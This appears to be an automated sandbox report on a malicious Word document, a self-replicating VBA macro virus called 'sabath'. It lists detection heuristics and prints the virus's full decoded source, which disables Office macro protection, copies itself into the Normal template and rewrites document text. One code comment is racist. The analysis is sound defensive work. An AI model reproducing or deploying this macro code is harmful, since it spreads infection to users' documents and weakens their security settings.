Verdict: MALICIOUS
Risk Score: 196

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and Auto_Close, which are commonly used for malicious purposes. The 'sabath' macro exports itself to 'c:\sabath.drv' and re-imports that file into whichever of the Normal template or the active document does not yet carry it, the classic Word macro-virus replication pattern, and it also disables Office macro-virus protection. The ClamAV detection as 'Win.Trojan.Pivis-2' further supports its malicious nature.
Heuristics (6)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub autoclose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3836 bytes |

SHA-256: 5de78fe5dfb212805f42a0981c9be752363638f0e3f7ba9ecdd3fa95648870a8
Script preview (first 1,000 lines of the extracted script; the original comments and string literals are CP1251 Cyrillic that was mis-decoded on extraction, repaired here, with comments translated to English):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "sabath"
'Coachman, don't rush! You're rushing, coachman!
Sub ViewVBCode()
On Error Resume Next
Call sabath
End Sub
Sub sabath()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
'Brought trouble on myself by CLICKing...
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("sabath").Export "c:\sabath.drv"
ActiveDocument.ReadOnlyRecommended = False
'There is no sadder tale in the world than the tale of a jammed RESET...
chislo = Int(Rnd * 100)
'Impudence is the second happiness.
'And the zombies here are quiet
'Should I go to work, I thought. And I didn't.
'Alcohol in small doses is harmless in any quantity!
'Americans - we don't make stars out of black people
If chislo = 99 Then MsgBox "Привет VicodinES от _\` /4 |3 /4 + |-|", vbSystemModal
If Day(Now()) = 1 Or 2 Or 3 Or 4 Or 5 Or 6 Or 13 Or 15 Or 17 Or 18 Or 19 Or 23 Or 25 Or 30 Or 31 Then Call Tooday
With Dialogs(wdDialogFileSummaryInfo)
'Even "RAMA" is butter when it's free.
.Author = " _\` /4 |3 /4 + |-| "
.Subject = "Viva VicodinES"
.Comments = "_\` /4 |3 /4 + |-| REproduction of Vic's XIXpoppy"
.Execute
'Coachman, don't rush! You're rushing, coachman!
End With
If NormalTemplate.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then TemplateNameCheck = True
If ActiveDocument.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then ActiveDocNameCheck = True
If TemplateNameCheck = True And ActiveDocNameCheck = False Then Set VIRIIconst = NormalTemplate.VBProject.VBComponents
If TemplateNameCheck = False And ActiveDocNameCheck = True Then Set VIRIIconst = ActiveDocument.VBProject.VBComponents
VIRIIconst.import "c:\sabath.drv"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If ActiveDocNameCheck = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
'MsgBox " _\` /4 |3 /4 + |-| tribute to VicodinES "
IDontKnowWhatItWas:
End Sub
Sub HelpAbout()
On Error Resume Next
MsgBox " _\` /4 |3 /4 + |-| ", vbInformation
End Sub
Sub AutoOpen()
On Error Resume Next
ShowVisualBasicEditor = False 'no VB editor
Call sabath
End Sub
Sub ToolsMacro()
On Error Resume Next
Call sabath
End Sub
Sub Tooday()
On Error Resume Next
Selection.HomeKey Unit:=wdStory
'Without effort you won't even shove it in there.
'Guard it like the apple of your eye - like that.
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = " он "
.Replacement.Text = "_\` /4 |3 /4 + |-|"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchAllWordForms = True
End With
Selection.Find.Execute Replace:=wdReplaceAll
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub
Sub FileTemplates()
On Error Resume Next
With Application
Call sabath
End Sub
'password for view is xx3
Sub autoclose()
On Error Resume Next
StatusBar = "Get Ur NEW AVir TODAY!!! _\` A |3 A T |-|"
End Sub
```